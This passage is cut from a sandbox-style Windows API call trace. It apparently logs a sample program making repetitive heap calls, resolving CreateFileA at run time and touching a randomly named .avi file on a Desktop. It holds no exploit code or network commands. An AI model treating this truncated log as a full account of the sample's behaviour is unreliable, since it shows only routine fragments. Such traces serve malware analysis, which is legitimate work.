hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.267] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.268] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0031.268] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.268] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.268] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.268] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbe0 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.268] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0031.269] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.269] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.269] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.270] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.270] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0031.271] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.271] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.271] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.272] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.272] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.273] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.273] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.273] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8899b8 [0031.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8899b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.274] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0031.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8899b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.274] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.274] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.274] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0031.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0031.275] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0031.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", cchWideChar=80, lpMultiByteStr=0x7f3630, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\5EM8.avi", lpUsedDefaultChar=0x0) returned 80 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.275] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 